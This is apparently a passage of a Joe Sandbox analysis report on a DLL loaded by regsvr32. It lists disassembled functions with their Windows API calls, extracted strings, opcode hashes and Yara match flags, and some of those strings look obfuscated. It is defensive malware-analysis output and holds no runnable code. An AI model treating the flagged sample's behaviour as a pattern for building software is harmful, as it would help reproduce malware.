                                                                    • Sleep.KERNEL32(?,?,00000000,00007FFF21BB6B19,?,?,00000000,00007FFF21BB6BC3,?,?,?,?,?,?,00000000,00007FFF21BB2DC8), ref: 00007FFF21BB30D2
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$AllocateHeapSleep
                                                                    • String ID:
                                                                    • API String ID: 4153772858-0
                                                                    • Opcode ID: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                    • Instruction ID: d29d61e031ed47b989406fa2adefd2f7b47939c646008ffcfc686abe70b3176a
                                                                    • Opcode Fuzzy Hash: fda341601c3db2866e613cad0830f714017b4f3b234a5a25ccfa8741b4d7d732
                                                                    • Instruction Fuzzy Hash: 3DF0C232E0978586EB609F16A85012E72F1FB98B90F841134EE5D83B75DF3DE9928704
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD0F5
                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD111
                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD139
                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD142
                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD158
                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD161
                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD177
                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD180
                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD19E
                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD1A7
                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD1D9
                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD1E8
                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD240
                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD260
                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,0000000A,000000FC,00000000,00007FFF21BB70D4,?,?,?,?,?,00007FFF21BB7194), ref: 00007FFF21BBD279
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                    • API String ID: 3085332118-232180764
                                                                    • Opcode ID: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                    • Instruction ID: 2b5772b223da507dcdfd87bc9163837ebf4df50b7f437fbda2c1ad6672955423
                                                                    • Opcode Fuzzy Hash: 3571919baaed57aa13675d85a49604ff28a57139c9f79241176628fa60ae3818
                                                                    • Instruction Fuzzy Hash: 7751E461E0AB4284EF65DB52AC6417C22F07F89B94F442475DC4E87BB5EE3DE6458208
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: String$free$ByteCharMultiWide$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 1446610345-0
                                                                    • Opcode ID: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                    • Instruction ID: c87ca70d4cd26f0e9d6865145bcf65c77cbe846e6f465a55d4fdcb8026773668
                                                                    • Opcode Fuzzy Hash: 1cb68e5ebb75471bd28e921dddda68db4bd0a605ea05e1978d1bd0bd9315b2d8
                                                                    • Instruction Fuzzy Hash: BFF1A072E096818AEB308F25D8501AD76F1FB44B98B546235EE5D97FA4CF3CEA408708
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
                                                                    • String ID: Norwegian-Nynorsk
                                                                    • API String ID: 2273835618-461349085
                                                                    • Opcode ID: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                    • Instruction ID: c7c36cfb66e72a8c1c15a82ee7f7b631c8be430ac2e12182407b69510f4c1b38
                                                                    • Opcode Fuzzy Hash: 27b601e54d08442215230f85cfe0824a991ba4f10c2dcca786a022abe7f281d3
                                                                    • Instruction Fuzzy Hash: 51615E22E0864A46FB75DF21982037D22F0BB44B45F186036CE4DC6AE5DF7CEA42D318
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: FormatTime$__ascii_stricmpfree
                                                                    • String ID: a/p$am/pm
                                                                    • API String ID: 2252689280-3206640213
                                                                    • Opcode ID: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                    • Instruction ID: 041bb239e6c54b0eb2fa7b1c1bf41363898e0bfb1d96a13891d5f9b87d9ff8bb
                                                                    • Opcode Fuzzy Hash: f0a1e010cfc2bba628f50de28a03b415369789bd89755694daa0cdadb7c0128b
                                                                    • Instruction Fuzzy Hash: A5F1C122D18A9285E7748F258E6017C67F1FB05784F58A036EE8DC7EA5DE3CEA45C309
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(?,?,?,?,?,00007FFF21BB7194,?,?,?,?,00007FFF21BB6C69,?,?,00000000,00007FFF21BB30C0), ref: 00007FFF21BB6FCF
                                                                    • GetStdHandle.KERNEL32(?,?,?,?,?,00007FFF21BB7194,?,?,?,?,00007FFF21BB6C69,?,?,00000000,00007FFF21BB30C0), ref: 00007FFF21BB70DB
                                                                    • WriteFile.KERNEL32 ref: 00007FFF21BB7115
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: File$HandleModuleNameWrite
                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                    • API String ID: 3784150691-4022980321
                                                                    • Opcode ID: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                    • Instruction ID: 186f1c52965061582cc3f3e719ea1cde985f2b085ecd24383bf4c3ceec704784
                                                                    • Opcode Fuzzy Hash: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                    • Instruction Fuzzy Hash: 58518B25E1864341FB349B25ED667BE22F1BF88794F806136DD0DC6EF6CE2CE6058218
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3778485334-0
                                                                    • Opcode ID: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                    • Instruction ID: 2ea2cd81de21c41a7a0aabef6d1edb6030e33a4f94b14859184c8a7ade18a578
                                                                    • Opcode Fuzzy Hash: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                    • Instruction Fuzzy Hash: D431AF35D0AB4289EB509B51EC903AD63B1FB88744F502076DA8E82B75DF7CE588C748
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _lock.LIBCMT ref: 00007FFF21BBE6EB
                                                                    • free.LIBCMT ref: 00007FFF21BBE7E2
                                                                      • Part of subcall function 00007FFF21BB3024: HeapFree.KERNEL32(?,?,00000000,00007FFF21BB2DDC,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB303A
                                                                      • Part of subcall function 00007FFF21BB3024: _errno.LIBCMT ref: 00007FFF21BB3044
                                                                      • Part of subcall function 00007FFF21BB3024: GetLastError.KERNEL32(?,?,00000000,00007FFF21BB2DDC,?,?,?,00007FFF21BB2DFF,?,?,?,00007FFF21BB254F,?,?,?,00007FFF21BB262A), ref: 00007FFF21BB304C
                                                                    • ___lc_codepage_func.LIBCMT ref: 00007FFF21BBE76B
                                                                      • Part of subcall function 00007FFF21BB6550: RtlCaptureContext.KERNEL32 ref: 00007FFF21BB658F
                                                                      • Part of subcall function 00007FFF21BB6550: IsDebuggerPresent.KERNEL32 ref: 00007FFF21BB662D
                                                                      • Part of subcall function 00007FFF21BB6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFF21BB6637
                                                                      • Part of subcall function 00007FFF21BB6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFF21BB6642
                                                                      • Part of subcall function 00007FFF21BB6550: GetCurrentProcess.KERNEL32 ref: 00007FFF21BB6658
                                                                      • Part of subcall function 00007FFF21BB6550: TerminateProcess.KERNEL32 ref: 00007FFF21BB6666
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentTerminate___lc_codepage_func_lockfree
                                                                    • String ID:
                                                                    • API String ID: 178205154-0
                                                                    • Opcode ID: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                    • Instruction ID: 03def5a60722e2167ff286733b59a3dff406bb2c9b180552bdbf2e7576d94f48
                                                                    • Opcode Fuzzy Hash: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                    • Instruction Fuzzy Hash: 1CD1A326E0868249E7309F25DCA067DA6F5BB85740F506135DE8DD3EB5CF3CE9518B08
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFF21BBE1C2), ref: 00007FFF21BBDFF2
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFF21BBE1C2), ref: 00007FFF21BBE004
                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFF21BBE1C2), ref: 00007FFF21BBE04F
                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFF21BBE1C2), ref: 00007FFF21BBE0E1
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFF21BBE1C2), ref: 00007FFF21BBE11B
                                                                    • free.LIBCMT ref: 00007FFF21BBE12F
                                                                      • Part of subcall function 00007FFF21BB6C34: _FF_MSGBANNER.LIBCMT ref: 00007FFF21BB6C64
                                                                      • Part of subcall function 00007FFF21BB6C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFF21BB30C0,?,?,00000000,00007FFF21BB6B19,?,?,00000000,00007FFF21BB6BC3), ref: 00007FFF21BB6C89
                                                                      • Part of subcall function 00007FFF21BB6C34: _errno.LIBCMT ref: 00007FFF21BB6CAD
                                                                      • Part of subcall function 00007FFF21BB6C34: _errno.LIBCMT ref: 00007FFF21BB6CB8
                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFF21BBE1C2), ref: 00007FFF21BBE145
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale$_errno$AllocateByteCharErrorHeapLastMultiWidefree
                                                                    • String ID:
                                                                    • API String ID: 2309262205-0
                                                                    • Opcode ID: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                    • Instruction ID: 561e29b9b6525a0bb42ad3c47d33913cb854cb506bbdd8ddcdb0e856bc501fb8
                                                                    • Opcode Fuzzy Hash: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                    • Instruction Fuzzy Hash: 8C519436E096428AE7609F219C6156DA3F2FB487A4F646535DE1E83FB4CF7CEA408304
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: _errno$DecodePointer_lock
                                                                    • String ID:
                                                                    • API String ID: 2175075375-0
                                                                    • Opcode ID: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                    • Instruction ID: 9e8d3ff00518fe304c6961d55fc46701702a5ff9d7b671ed157b47df545b7789
                                                                    • Opcode Fuzzy Hash: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                    • Instruction Fuzzy Hash: ED318222F0865242FB35AA75986677E61E1BF44780F04A438DF0D8BFA6DF2CD9118748
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                    • String ID:
                                                                    • API String ID: 1269745586-0
                                                                    • Opcode ID: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                    • Instruction ID: ebd1713a3c03c209a5842e2fac382c13a2eb231c14c078b387844728b3a71ccd
                                                                    • Opcode Fuzzy Hash: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                    • Instruction Fuzzy Hash: D5313E72E09B8686DB249B64E8503AEB3B0FB88744F401136DA8D83A69DF3CD549CB04
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                    • API String ID: 0-2447245168
                                                                    • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                    • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                    • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401488657.00007FFF21B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFF21B70000, based on PE: true
                                                                    • Associated: 00000002.00000002.401480666.00007FFF21B70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401578857.00007FFF21BC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401587665.00007FFF21BC6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000002.00000002.401628360.00007FFF21BC9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7fff21b70000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                    • Instruction ID: ce5279e30d5305a28d80c848bbdb13c7060f24b6debda5c8de4e9c617ee32220
                                                                    • Opcode Fuzzy Hash: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                    • Instruction Fuzzy Hash: 9D212F21E0854B85FB70DB21ED602BD63F1BF48785F846131DE4D969B5EE2CE646C708
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 1h$I-$IY$QL&$li7$o
                                                                    • API String ID: 0-890095520
                                                                    • Opcode ID: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                    • Instruction ID: 3309774e0679b3a301b7d0c809474a48ec240f33eb9a68417431e078f6a2137f
                                                                    • Opcode Fuzzy Hash: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                    • Instruction Fuzzy Hash: 72921875604BC88BCBB8DF24DC85BDD7BE0FB86305F20561DD85E9AA60CBB85645CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 1$ {,$"$$-%$Rku$ i
                                                                    • API String ID: 0-1845893065
                                                                    • Opcode ID: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                    • Instruction ID: cb6ea2ed9b9de3b3effb5fe074f3157ffd1060f729125c5012da7c2884d2f589
                                                                    • Opcode Fuzzy Hash: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                    • Instruction Fuzzy Hash: EB52D470544BCA8BCBB8CF24CC85BEF7BA0FB44306F155529D89A8A291DBB85749CF41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: VUS/$YV~$p$@$EX$OX
                                                                    • API String ID: 0-2743166816
                                                                    • Opcode ID: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                    • Instruction ID: 6ceb6cba6b0314249f0ec67deadc173c496f62a90fe3cec01f017443767c42d8
                                                                    • Opcode Fuzzy Hash: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                    • Instruction Fuzzy Hash: BD3213711097848FD3A9CF68C58A65BBBF0FBCA744F104A1DF68687260C7B6D949CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.401404502.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                    • API String ID: 0-2100131636
                                                                    • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                    • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                    • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                    Uniqueness

